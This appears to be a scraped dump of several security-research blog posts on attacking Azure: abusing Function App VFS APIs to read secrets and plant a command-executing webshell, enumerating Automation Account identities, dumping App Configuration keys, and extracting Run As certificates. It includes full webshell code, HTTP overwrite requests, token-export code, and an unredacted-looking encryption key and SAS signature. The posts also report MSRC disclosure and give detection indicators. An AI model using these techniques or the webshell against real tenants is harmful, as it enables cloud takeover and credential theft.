mtime  : 2022-09-21T22:16:09.1248576+00:00 
crtime : 2022-09-21T22:16:09.1248576+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1113/?relativePath=0&api-version=2021-01-15 
path   : /proc/1113 

name   : 1188 
size   : 0 
mtime  : 2022-09-21T22:17:18.5695703+00:00 
crtime : 2022-09-21T22:17:18.5695703+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1188/?relativePath=0&api-version=2021-01-15 
path   : /proc/1188

For the next step, we can use PowerShell to request the “environ” file from PID 59 to get the environmental variables for that PID. We will then write it to a temp file and “get-content” the file to output it.

$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token 

Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/59/environ?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"} -OutFile .\TempFile.txt 

gc .\TempFile.txt 

PowerShell Output - Newlines added for clarity: 
CONTAINER_IMAGE_URL=mcr.microsoft.com/azure-functions/mesh:3.13.1-python3.7 
REGION_NAME=Central US  
HOSTNAME=SandboxHost-637993944271867487  
[Truncated] 
CONTAINER_ENCRYPTION_KEY=bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=  
LANG=C.UTF-8  
CONTAINER_NAME=E9911CE2-637993944227393451 
[Truncated]
CONTAINER_START_CONTEXT_SAS_URI=https://wawsstorageproddm1157.blob.core.windows.net/azcontainers/e9911ce2-637993944227393451?sv=2014-02-14&sr=b&sig=5ce7MUXsF4h%2Fr1%2BfwIbEJn6RMf2%2B06c2AwrNSrnmUCU%3D&st=2022-09-21T21%3A55%3A22Z&se=2023-09-21T22%3A00%3A22Z&sp=r
[Truncated]

In the output, we can see that there are a couple of interesting variables. 

  • CONTAINER_ENCRYPTION_KEY 
  • CONTAINER_START_CONTEXT_SAS_URI 

The encryption key variable is self-explanatory, and the SAS URI should be familiar to anyone that read Jake Karnes’ post on attacking Azure SAS tokens. If we navigate to the SAS token URL, we’re greeted with an “encryptedContext” JSON blob. Conveniently, we have the encryption key used for this data. 

A screenshot of an "encryptedContext" JSON blob with the encryption key.

Using CyberChef, we can quickly pull together the pieces to decrypt the data. In this case, the IV is the first portion of the JSON blob (“Bad/iquhIPbJJc4n8wcvMg==”). We know the key (“bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=”), so we will just use the middle portion of the Base64 JSON blob as our input.  

Here’s what the recipe looks like in CyberChef: 

An example of using CyberChef to decrypt data from a JSON blob.

Once decrypted, we have another JSON blob of data, now with only one encrypted chunk (“EncryptedEnvironment”). We won’t be dealing with that data as the important information has already been decrypted below. 

{"SiteId":98173790,"SiteName":"vfspoc2", 
"EncryptedEnvironment":"2 | Xj[REDACTED]== | XjAN7[REDACTED]KRz", 
"Environment":{"FUNCTIONS_EXTENSION_VERSION":"~3", 
"APPSETTING_FUNCTIONS_EXTENSION_VERSION":"~3", 
"FUNCTIONS_WORKER_RUNTIME":"python", 
"APPSETTING_FUNCTIONS_WORKER_RUNTIME":"python", 
"AzureWebJobsStorage":"DefaultEndpointsProtocol=https;AccountName=
storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;EndpointSuffix=
core.windows.net", 
"APPSETTING_AzureWebJobsStorage":"DefaultEndpointsProtocol=https;
AccountName=storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;
EndpointSuffix=core.windows.net", 
"ScmType":"None", 
"APPSETTING_ScmType":"None", 
"WEBSITE_SITE_NAME":"vfspoc2", 
"APPSETTING_WEBSITE_SITE_NAME":"vfspoc2", 
"WEBSITE_SLOT_NAME":"Production", 
"APPSETTING_WEBSITE_SLOT_NAME":"Production", 
"SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.blob.core.
windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-02-14&sr=b&
sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"APPSETTING_SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.
blob.core.windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-
02-14&sr=b&sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"WEBSITE_AUTH_ENCRYPTION_KEY":"F1[REDACTED]25", 
"AzureWebEncryptionKey":"F1[REDACTED]25", 
"WEBSITE_AUTH_SIGNING_KEY":"AF[REDACTED]DA", 
[Truncated] 
"FunctionAppScaleLimit":0,"CorsSpecializationPayload":{"Allowed
Origins":["https://functions.azure.com", 
"https://functions-staging.azure.com", 
"https://functions-next.azure.com"],"SupportCredentials":false},
"EasyAuthSpecializationPayload":{"SiteAuthEnabled":true,"SiteAuth
ClientId":"18[REDACTED]43", 
"SiteAuthAutoProvisioned":true,"SiteAuthSettingsV2Json":null}, 
"Secrets":{"Host":{"Master":"Q[REDACTED]=","Function":{"default":
"k[REDACTED]="}, 
"System":{}},"Function":[]}} 

The important things to highlight here are: 

  • AzureWebJobsStorage and APPSETTING_AzureWebJobsStorage 
  • SCM_RUN_FROM_PACKAGE and APPSETTING_SCM_RUN_FROM_PACKAGE 
  • Function App “Master” and “Default” secrets 

It should be noted that the “MICROSOFT_PROVIDER_AUTHENTICATION_SECRET” will also be available if the Function App has been set up to authenticate users via Azure AD. This is an App Registration credential that might be useful for gaining access to the tenant. 

While the jobs storage information is a nice way to get access to the Function App Storage Account, we will be more interested in the Function “Master” App Secret, as that can be used to overwrite the functions in the app. By overwriting the functions, we can get full command execution in the container. This would also allow us to gain access to any attached Managed Identities on the Function App. 

For our Proof of Concept, we’ll use the baseline PowerShell “hello” function as our template to overwrite: 

A screenshot of the PowerShell "hello" function.

This basic function just returns the “Name” submitted from a request parameter. For our purposes, we’ll convert this over to a Function App webshell (of sorts) that uses the “Name” parameter as the command to run.

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function 
processed a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. 
Pass a name in the query string or in the request body for a 
personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: 
",$cmdoutput)) 
} 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 

To overwrite the function, we will use BurpSuite to send a PUT request with our new code. Before we do that, we need to make an initial request for the function code to get the associated ETag to use with PUT request.

Initial GET of the Function Code:

GET /admin/vfs/home/site/wwwroot/HttpTrigger1/run.
ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 

HTTP/1.1 200 OK 
Content-Type: application/octet-stream 
Date: Wed, 21 Sep 2022 23:29:01 GMT 
Server: Kestrel 
ETag: "38aaebfb279cda08" 
Last-Modified: Wed, 21 Sep 2022 23:21:17 GMT 
Content-Length: 852 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 
[Truncated] 
}) 

PUT Overwrite Request Using the Tag as the "If-Match" Header:

PUT /admin/vfs/home/site/wwwroot/HttpTrigger1/
run.ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 
Content-Length: 851 
If-Match: "38aaebfb279cda08" 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function processed 
a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. 
Pass a name in the query string or in the request body for a 
personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: 
",$cmdoutput)) 
} 

# Associate values to output bindings by calling 
'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 


HTTP Response: 

HTTP/1.1 204 No Content 
Date: Wed, 21 Sep 2022 23:32:32 GMT 
Server: Kestrel 
ETag: "c243578e299cda08" 
Last-Modified: Wed, 21 Sep 2022 23:32:32 GMT

The server should respond with a 204 No Content, and an updated ETag for the file. With our newly updated function, we can start executing commands. 

Sample URL: 

https://vfspoc2.azurewebsites.net/api/HttpTrigger1?name=
whoami&code=Q[REDACTED]= 

Browser Output: 

Browser output for the command "whoami."

Now that we have full control over the Function App container, we can potentially make use of any attached Managed Identities and generate tokens for them. In our case, we will just add the following PowerShell code to the function to set the output to the management token we’re trying to export. 

$resourceURI = "https://management.azure.com" 
$tokenAuthURI = $env:IDENTITY_ENDPOINT + "?resource=
$resourceURI&api-version=2019-08-01" 
$tokenResponse = Invoke-RestMethod -Method Get 
-Headers @{"X-IDENTITY-HEADER"="$env:IDENTITY_HEADER"} 
-Uri $tokenAuthURI 
$body = $tokenResponse.access_token

Example Token Exported from the Browser: 

Example token exported from the browser.

For more information on taking over Azure Function Apps, check out this fantastic post by Bill Ben Haim and Zur Ulianitzky: 10 ways of gaining control over Azure function Apps.  

Conclusion 

Let's recap the issue:  

  1. Start as a user with the Reader role on a Function App. 
  1. Abuse the undocumented VFS API to read arbitrary files from the containers.
  1. Access encryption keys on the Windows containers or access the “proc” files from the Linux Container.
  1. Using the Linux container, read the process environmental variables. 
  1. Use the variables to access configuration information in a SAS token URL. 
  1. Decrypt the configuration information with the variables. 
  1. Use the keys exposed in the configuration information to overwrite the function and gain command execution in the Linux Container. 

All this being said, we submitted this issue through MSRC, and they were able to remediate the file access issues. The APIs are still there, so you may be able to get access to some of the Function App container and application files with the appropriate role, but the APIs are now restricted for the Reader role. 

MSRC timeline

The initial disclosure for this issue, focusing on Windows containers, was sent to MSRC on Aug 2, 2022. A month later, we discovered the additional impact related to the Linux containers and submitted a secondary ticket, as the impact was significantly higher than initially discovered and the different base container might require a different remediation.  

There were a few false starts on the remediation date, but eventually the vulnerable API was restricted for the Reader role on January 17, 2023. On January 24, 2023, Microsoft rolled back the fix after it caused some issues for customers. 

On March 6, 2023, Microsoft reimplemented the fix to address the issue. The rollout was completed globally on March 8. At the time of publishing, the Reader role no longer has the ability to read files with the Function App VFS APIs. It should be noted that the Linux escalation path is still a viable option if an attacker has command execution on a Linux Function App. 

[post_title] => Escalating Privileges with Azure Function Apps [post_excerpt] => Explore how undocumented APIs used by the Azure Function Apps Portal menu allowed for directory traversal on the Function App containers. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-function-apps [to_ping] => [pinged] => [post_modified] => 2023-03-23 08:24:38 [post_modified_gmt] => 2023-03-23 13:24:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29749 [menu_order] => 126 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [8] => WP_Post Object ( [ID] => 29393 [post_author] => 10 [post_date] => 2023-02-16 09:00:00 [post_date_gmt] => 2023-02-16 15:00:00 [post_content] =>

Intro 

Azure Automation Accounts are a frequent topic on the NetSPI technical blog. To the point that we compiled our research into a presentation for the DEFCON 30 cloud village and the Azure Cloud Security Meetup Group. We're always trying to find new ways to leverage Automation Accounts during cloud penetration testing. To automate enumerating our privilege escalation options, we looked at how Automation Accounts handle authenticating as other accounts within a runbook, and how we can abuse those authentication connections to pivot to other Azure resources.

Passing the Identity in Azure Active Directory 

As a primer, an Azure Active Directory (AAD) identity (User, App Registration, or Managed Identity) can have a role (Contributor) on an Automation Account that allows them to modify the account. The Automation Account can have attached identities that allow the account to authenticate to Azure AD as those identities. Once authenticated as the identity, the Automation Account runbook code will then run any Azure commands in the context of the identity. If that Identity has additional (or different) permissions from those of the AAD user that is writing the runbook, the AAD user can abuse those permissions to escalate or move laterally.

Simply put, Contributor on the Automation Account allows an attacker to be any identity attached to the Automation Account. These attached identities can have additional privileges, leading to a privilege escalation for the original Contributor account. 

Available Identities for Azure Automation Accounts 

There are two types of identities available for Automation Accounts: Run As Accounts and Managed Identities. The Run As Accounts will be deprecated on September 30, 2023, but they have been a source of several issues since they were introduced. When initially created, a Run As Account will be granted the Contributor role on the subscription it is created in.  

These accounts are also App Registrations in Azure Active Directory that use certificates for authentication. These certificates can be extracted from Automation Accounts with a runbook and used for gaining access to the Run As Account. This is also helpful for persistence, as App Registrations typically don’t have conditional access restrictions applied. 

For more on Azure Privilege Escalation using Managed Identities, check out this blog.

Screenshot of the Run As account type, one of two identities available for Azure Automation Accounts.

Managed Identities are the currently recommended option for using an execution identity in Automation Account runbooks. Managed Identities can either be system-assigned or user-assigned. System-assigned identities are tied to the resource that they are created for and cannot be shared between resources. User-assigned Managed Identities are a subscription level resource that can be shared across resources, which is handy for situations where resources, like multiple App Services applications, require shared access to a specific resource (Storage Account, Key Vault, etc.). Managed Identities are a more secure option for Automation Account Identities, as their access is temporary and must be generated from the attached resource.

A description of a system-assigned identity in Azure Automation Account.

Since Automation Accounts are frequently used to automate actions in multiple subscriptions, they are often granted roles in other subscriptions, or on higher level management groups. As attackers, we like to look for resources in Azure that can allow for pivoting to other parts of an Azure tenant. To help in automating this enumeration of the identity privileges, we put together a PowerShell script. 

Automating Privilege Enumeration 

The Get-AzAutomationConnectionScope function in MicroBurst is a relatively simple PowerShell script that uses the following logic:

  • Get a list of available subscriptions 
    • For each selected subscription 
      • Get a list of available connections (Run As or Managed Identity) 
      • Build the Automation Account runbook to authenticate as the connection, and list available subscriptions and available Key Vaults 
      • Upload and run the runbook 
      • Retrieve the output and return it
      • Delete the runbook 

In general, we are going to create a "malicious" automation runbook that goes through all the available identities in the Automation Account to tell us the available subscriptions and Key Vaults. Since the Key Vaults utilize a secondary access control mechanism (Access Policies), the script will also review the policies for each available Key Vault and report back any that have entries for our current identity. While a Contributor on a Key Vault can change these Access Policies, it is helpful to know which identities already have Key Vault access. 

The usage of the script is simple. Just authenticate to the Az PowerShell module (Connect-AzAccount) as a Contributor on an Automation Account and run “Get-AzAutomationConnectionScope”. The verbose flag is very helpful here, as runbooks can take a while to run, and the verbose status update is nice.

PowerShell script for automating the enumeration of identity privileges.

Note that this will also work for cross-tenant Run As connections. As a proof of concept, we created a Run As account in another tenant (see “Automation Account Connection – dso” above), uploaded the certificate and authentication information (Application ID and Tenant) to our Automation Account, and the connection was usable with this script. This can be a convenient way to pivot to other tenants that your Automation Account is responsible for. That said, it's rare for us to see a cross-tenant connection like that.

As a final note on the script, the "Classic Run As" connections in an older Automation Account will not work with this script. They may show up in your output, but they require additional authentication logic in the runbook, and given the low likelihood of their usage, we've opted to avoid adding the logic in for those connections. 

Indicators of Compromise 

To help out the Azure defenders, here is a rough outline on how this script would look in a subscription/tenant from an incident response perspective: 

  1. Initial Account Authentication 
    a.   User/App Registration authenticates via the Az PowerShell cmdlets 
  1. Subscriptions / Automation Accounts Enumerated 
    a.   The script has you select an available subscription to test, then lists the available Automation Accounts to select from 
  1. Malicious Runbook draft is created in the Automation Account
    a.   Microsoft.Automation/automationAccounts/runbooks/write
    b.   Microsoft.Automation/automationAccounts/runbooks/draft/write 
  1. Malicious Runbook is published to the Automation Account
    a.   Microsoft.Automation/automationAccounts/runbooks/publish/action 
  1. Malicious Runbook is executed as a job
    a.   Microsoft.Automation/automationAccounts/jobs/write 
  1. Run As connections and/or Managed Identities should show up as authentication events 
  1. Malicious Runbook is deleted from the Automation Account
    a.   Microsoft.Automation/automationAccounts/runbooks/delete 

Providing the full rundown is a little beyond the scope of this blog, but Lina Lau (@inversecos) has a great blog on detections for Automation Accounts that covers a persistence technique I previously outlined in a previous article titled, Maintaining Azure Persistence via Automation Accounts. Lina’s blog should also cover most of the steps that we have outlined above. 

For additional detail on Automation Account attack paths, take a look at Andy Robbins’ blog, Managed Identity Attack Paths, Part 1: Automation Accounts

Conclusion 

While Automation Account identities are often a necessity for automating actions in an Azure tenant, they can allow a user (with the correct role) to abuse the identity permissions to escalate and/or pivot to other subscriptions.

The function outlined in this blog should be helpful for enumerating potential pivot points from an existing Automation Account where you have Contributor access. From here, you could create custom runbooks to extract credentials, or pivot to Virtual Machines that your identity has access to. Alternatively, defenders can use this script to see the potential blast radius of a compromised Automation Account in their subscriptions. 

Ready to improve your Azure security? Explore NetSPI’s Azure Cloud Penetration Testing solutions. Or checkout these blog posts for more in-depth research on Azure Automation Accounts:  

[post_title] => Pivoting with Azure Automation Account Connections [post_excerpt] => Discover a helpful function for enumerating potential pivot points from an existing Azure Automation Account with Contributor level access. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-automation-account-connections [to_ping] => [pinged] => [post_modified] => 2023-02-15 11:38:52 [post_modified_gmt] => 2023-02-15 17:38:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29393 [menu_order] => 138 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [9] => WP_Post Object ( [ID] => 28955 [post_author] => 10 [post_date] => 2022-12-08 10:00:00 [post_date_gmt] => 2022-12-08 16:00:00 [post_content] =>

Most Azure environments that we test contain multiple kinds of application hosting services (App Services, AKS, etc.). As these applications grow and scale, we often find that the application configuration parameters will be shared between the multiple apps. To help with this scaling challenge, Microsoft offers the Azure App Configuration service. The service allows Azure users to create key-value pairs that can be shared across multiple application resources. In theory, this is a great way to share non-sensitive configuration values across resources. In practice, we see these configurations expose sensitive information to users with permission to read the values.

TL;DR

The Azure App Configuration service can often hold sensitive data values. This blog post outlines gathering and using access keys for the service to retrieve the configuration values.

What are App Configurations?

The App Configuration service is a very simple service. Provide an Id and Secret to an “azconfig.io” endpoint and get back a list of key-value pairs that integrate into your application environment. This is a really simple way to share configuration information across multiple applications, but we have frequently found sensitive information (keys, passwords, connection strings) in these configuration values. This is a known problem, as Microsoft specifically calls out secret storage in their documentation, noting Key Vaults as the recommended secure solution.

Gathering Access Keys

Within the App Configuration service, two kinds of access keys (Read-write and Read-only) can be used for accessing the service and the configuration values. Additionally, Read-write keys allow you to change the stored values, so access to these keys could allow for additional attacks on applications that take action on these values. For example, by modifying a stored value for an “SMBSHAREHOST” parameter, we might be able to force an application to initiate an SMB connection to a host that we control. This is just one example, but depending on how these values are utilized, there is potential for further attacks. 

Regardless of the type of key that an attacker acquires, this can lead to access the configuration values. Much like the other key-based authentication services in Azure, you are also able to regenerate these keys. This is particularly useful if your keys are ever unintentionally exposed.

To read these keys, you will need Contributor role access to the resource or access to a role with the “Microsoft.AppConfiguration/configurationStores/ListKeys/” action.

From the portal, you can copy out the connection string directly from the “Access keys” menu.

An example of the portal in an ap configuration service.

This connection string will contain the Endpoint, Id, and Secret, which can all be used together to access the service.

Alternatively, using the Az PowerShell cmdlets, we can list out the available App Configurations (Get-AzAppConfigurationStore) and for each configuration store, we can get the keys (Get-AzAppConfigurationStoreKey). This process is also automated by the Get-AzPasswords function in MicroBurst with the “AppConfiguration” flag.

An example of an app configuration access key found in public data sources.

Finally, if you don’t have initial access to an Azure subscription to collect these access keys, we have found App Configuration connection strings in web applications (via directory traversal/local file include attacks) and in public GitHub repositories. A cursory search of public data sources results in a fair number of hits, so there are a few access keys floating around out there.

Using the Keys

Typically, these connection strings are tied to an application environment, so the code environment makes the calls out to Azure to gather the configurations. When initially looking into this service, we used a Microsoft Learn example application with our connection string and proxied the application traffic to look at the request out to azconfig.io.

This initial look into the azconfig.io API calls showed that we needed to use the Id and Secret to sign the requests with a SHA256-HMAC signature. Conveniently, Microsoft provides documentation on how we can do this. Using this sample code, we added a new function to MicroBurst to make it easier to request these configurations.

The Get-AzAppConfiguration function (in the “Misc” folder) can be used with the connection string to dump all the configuration values from an App Configuration.

A list of configuration values from the Get-AzAppConfiguration function.

In our example, I just have “test” values for the keys. As noted above, if you have the Read-write key for the App Configuration, you will be able to modify the values of any of the keys that are not set to “locked”. Depending on how these configuration values are interpreted by the application, this could lead to some pivoting opportunities.

IoCs

Since we just provided some potential attack options, we also wanted to call out any IoCs that you can use to detect an attacker going after your App Configurations:

  • Azure Activity Log - List Access Keys
    • Category – “Administrative”
    • Action – “Microsoft.AppConfiguration/configurationStores/ListKeys/action”
    • Status – “Started”
    • Caller – < UPN of account listing keys>
An example of an app configuration audit log, capturing details of the account used to access data.
  • App Configuration Service Logs

Conclusions

We showed you how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs. This will hopefully give Azure pentesters something to work with if they run into an App Configuration connection string and defenders areas to look at to help secure their configuration environments.

For those using Azure App Configurations, make sure that you are not storing any sensitive information within your configuration values. Key Vaults are a much better solution for this and will give you additional protections (Access Policies and logging) that you don’t have with App Configurations. Finally, you can also disable access key authentication for the service and rely on Azure Active Directory (AAD) for authentication. Depending on the configuration of your environment, this may be a more secure configuration option.

Need help testing your Azure app configurations? Explore NetSPI’s Azure cloud penetration testing.

[post_title] => How to Gather Azure App Configurations [post_excerpt] => Learn how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gathering-azure-app-configurations [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:18:32 [post_modified_gmt] => 2023-03-16 14:18:32 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28955 [menu_order] => 169 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 27487 [post_author] => 10 [post_date] => 2022-03-17 08:00:00 [post_date_gmt] => 2022-03-17 13:00:00 [post_content] =>

On the NetSPI blog, we often focus on Azure Automation Accounts. They offer a fair amount of attack surface area during cloud penetration tests and are a great source for privilege escalation opportunities.  

During one of our recent Azure penetration testing assessments, we ran into an environment that was using Automation Account Hybrid Workers to run automation runbooks on virtual machines. Hybrid Workers are an alternative to the traditional Azure Automation Account container environment for runbook execution. Outside of the “normal” runbook execution environment, automation runbooks need access to additional credentials to interact with Azure resources. This can lead to a potential privilege escalation scenario that we will cover in this blog.

TL;DR

Azure Hybrid Workers can be configured to use Automation Account “Run as” accounts, which can expose the credentials to anyone with local administrator access to the Hybrid Worker. Since “Run as” accounts are typically subscription contributors, this can lead to privilege escalation from multiple Azure Role-Based Access Control (RBAC) roles.

What are Azure Hybrid Workers?

For those that need more computing resources (CPU, RAM, Disk, Time) to run their Automation Account runbooks, there is an option to add Hybrid Workers to an Automation Account. These Hybrid Workers can be Azure Virtual Machines (VMs) or Arc-enabled servers, and they allow for additional computing flexibility over the normal limitations of the Automation Account hosted environment. Typically, I’ve seen Hybrid Workers as Windows-based Azure VMs, as that’s the easiest way to integrate with the Automation Account runbooks. 

Add Hybrid Workers to an Automation Account

In this article, we’re going to focus on instances where the Hybrid Workers are Windows VMs in Azure. They’re the most common configuration that we run into, and the Linux VMs in Azure can’t be configured to use the “Run as” certificates, which are the target of this blog.

The easiest way to identify Automation Accounts that use Hybrid Workers is to look at the “Hybrid worker groups” section of an Automation Account in the portal. We will be focusing on the “User” groups, versus the “System” groups for this post. 

The easiest way to identify Automation Accounts that use Hybrid Workers is to look at the “Hybrid worker groups” section of an Automation Account in the portal.

Additionally, you can use the Az PowerShell cmdlets to identify the Hybrid Worker groups, or you can enumerate the VMs that have the “HybridWorkerExtension” VM extension installed. I’ve found this last method is the most reliable for finding potentially vulnerable VMs to attack.

Additional Azure Automation Accounts Research:

Running Jobs on the Workers

To run jobs on the Hybrid Worker group, you can modify the “Run settings” in any of your runbook execution options (Schedules, Webhook, Test Pane) to “Run on” the Hybrid Worker group.

To run jobs on the Hybrid Worker group, you can modify the “Run settings” in any of your runbook execution options (Schedules, Webhook, Test Pane) to “Run on” the Hybrid Worker group.

When the runbook code is executed on the Hybrid Worker, it is run as the “NT AUTHORITY\SYSTEM” account in Windows, or “root” in Linux. If an Azure AD user has a role (Automation Contributor) with Automation Account permissions, and no VM permissions, this could allow them to gain privileged access to VMs.

We will go over this in greater detail in part two of this blog, but Hybrid Workers utilize an undocumented internal API to poll for information about the Automation Account (Runbooks, Credentials, Jobs). As part of this, the Hybrid Workers are not supposed to have direct access to the certificates that are used as part of the traditional “Run As” process. As you will see in the following blog, this isn’t totally true.

To make up for the lack of immediate access to the “Run as” credentials, Microsoft recommends exporting the “Run as” certificate from the Automation Account and installing it on each Hybrid Worker in the group of workers. Once installed, the “Run as” credential can then be referenced by the runbook, to authenticate as the app registration.

If you have access to an Automation Account, keep an eye out for any lingering “Export-RunAsCertificateToHybridWorker” runbooks that may indicate the usage of the “Run as” certificates on the Hybrid Workers.

If you have access to an Automation Account, keep an eye out for any lingering “Export-RunAsCertificateToHybridWorker” runbooks that may indicate the usage of the “Run as” certificates on the Hybrid Workers.

The issue with installing these “Run As” certificates on the Hybrid Workers is that anyone with local administrator access to the Hybrid Worker can extract the credential and use it to authenticate as the “Run as” account. Given that “Run as” accounts are typically configured with the Contributor role at the subscription scope, this could result in privilege escalation.

Extracting “Run As” Credentials from Hybrid Workers

We have two different ways of accessing Windows VMs in Azure, direct authentication (Local or Domain accounts) and platform level command execution (VM Run Command in Azure). Since there are a million different ways that someone could gain access to credentials with local administrator rights, we won’t be covering standard Windows authentication. Instead, we will briefly cover the multiple Azure RBAC roles that allow for various ways of command execution on Azure VMs.

Affected Roles:

Where noted above (VM Extension Rights), the VM Extension command execution method comes from the following NetSPI blog: Attacking Azure with Custom Script Extensions.

Since the above roles are not the full Contributor role on the subscription, it is possible for someone with one of the above roles to extract the “Run as” credentials from the VM (see below) to escalate to a subscription Contributor. This is a somewhat similar escalation path to the one that we previously called out for the Log Analytics Contributor role.

Exporting the Certificate from the Worker

As a local administrator on the Hybrid Worker VM, it’s fairly simple to export the certificate. With Remote Desktop Protocol (RDP) access, we can just manually go into the certificate manager (certmgr), find the “Run as” certificate, and export it to a pfx file.

With Remote Desktop Protocol (RDP) access, we can just manually go into the certificate manager (certmgr), find the “Run as” certificate, and export it to a pfx file.

At this point we can copy the file from the Hybrid Worker to use for authentication on another system. Since this is a bit tedious to do at scale, we’ve automated the whole process with a PowerShell script.

Automating the Process

The following script is in the MicroBurst repository under the “Az” folder:

https://github.com/NetSPI/MicroBurst/blob/master/Az/Invoke-AzHybridWorkerExtraction.ps1

This script will enumerate any running Windows virtual machines configured with the Hybrid Worker extension and will then run commands on the VMs (via Invoke-AzVMRunCommand) to export the available private certificates. Assuming the Hybrid Worker is only configured with one exportable private certificate, this will return the certificate as a Base64 string in the run command output.

PS C:\temp\hybrid> Invoke-AzHybridWorkerExtraction -Verbose
VERBOSE: Logged In as kfosaaen@notarealdomain.com
VERBOSE: Getting a list of Hybrid Worker VMs
VERBOSE: 	Running extraction script on the HWTest virtual machine
VERBOSE: 		Looking for the attached App Registration... This may take a while in larger environments
VERBOSE: 			Writing the AuthAs script
VERBOSE: 		Use the C:\temp\HybridWorkers\AuthAsNetSPI_tester_[REDACTED].ps1 script to authenticate as the NetSPI_sQ[REDACTED]g= App Registration
VERBOSE: 	Script Execution on HWTest Completed
VERBOSE: Run as Credential Dumping Activities Have Completed

The script will then write this Base64 certificate data to a file and use the resulting certificate thumbprint to match against App Registration credentials in Azure AD. This will allow the script to find the App Registration Client ID that is needed to authenticate with the exported certificate.

Finally, this will create an “AuthAs” script (noted in the output) that can be used to authenticate as the “Run as” account, with the exported private certificate.

PS C:\temp\hybrid> ls | select Name, Length
Name                                        Length
----                                        ------
AuthAsNetSPI_tester_[Redacted_Sub_ID].ps1   1018
NetSPI_tester_[Redacted_Sub_ID].pfx         2615

This script can be run with any RBAC role that has VM “Run Command” rights on the Hybrid Workers to extract out the “Run as” credentials.

Authenticating as the “Run As” Account

Now that we have the certificate, we can use the generated script to authenticate to the subscription as the “Run As” account. This is very similar to what we do with exporting credentials in the Get-AzPasswords function, so this may look familiar.

PS C:\temp\hybrid> .\AuthAsNetSPI_tester_[Redacted_Sub_ID].ps1
   PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My
Thumbprint                                Subject
----------                                -------
BDD023EC342FE04CC1C0613499F9FF63111631BB  DC=NetSPI_tester_[Redacted_Sub_ID]

Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud], [AzureUSGovernment, AzureUSGovernment]}
Context      : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext

PS C:\temp\hybrid> (Get-AzContext).Account                                                                               
Id                    : 52[REDACTED]57
Type                  : ServicePrincipal
Tenants               : {47[REDACTED]35}
Credential            :
TenantMap             : {}
CertificateThumbprint : BDD023EC342FE04CC1C0613499F9FF63111631BB
ExtendedProperties    : {[Subscriptions, d4[REDACTED]b2], [Tenants, 47[REDACTED]35], [CertificateThumbprint, BDD023EC342FE04CC1C0613499F9FF63111631BB]}

Alternative Options

Finally, any user with the ability to run commands as “NT AUTHORITY\SYSTEM” on the Hybrid Workers is also able to assume the authenticated Azure context that results from authenticating (Connect-AzAccount) to Azure while running a job as a Hybrid Worker. 

This would result in users being able to run Az PowerShell module functions as the “Run as” account via the Azure “Run command” and “Extension” features that are available to many of the roles listed above. Assuming the “Connect-AzAccount” function was previously used with a runbook, an attacker could just use the run command feature to run other Az module functions with the “Run as” context.

Additionally, since the certificate is installed on the VM, a user could just use the certificate to directly authenticate from the Hybrid Worker, if there was no active login context.

Summary

In conjunction with the issues outlined in part two of this blog, we submitted our findings to MSRC.

